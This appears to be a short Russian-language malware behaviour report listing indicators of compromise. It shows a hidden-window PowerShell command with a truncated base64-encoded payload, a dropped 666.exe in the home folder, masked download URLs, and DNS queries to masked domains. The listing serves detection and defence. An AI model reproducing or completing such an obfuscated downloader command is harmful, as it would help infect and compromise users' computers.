Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe
- http://os####developer.com/pay/fjlMbuIg/
- http://ba###afe.com/wp-content2/91iwhvle00-0nq1xldstn-293/
- DNS ASK co###print.net
- DNS ASK st####tphysio.ca
- DNS ASK os####developer.com
- DNS ASK ba###afe.com
- DNS ASK wo###sales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...' (со скрытым окном)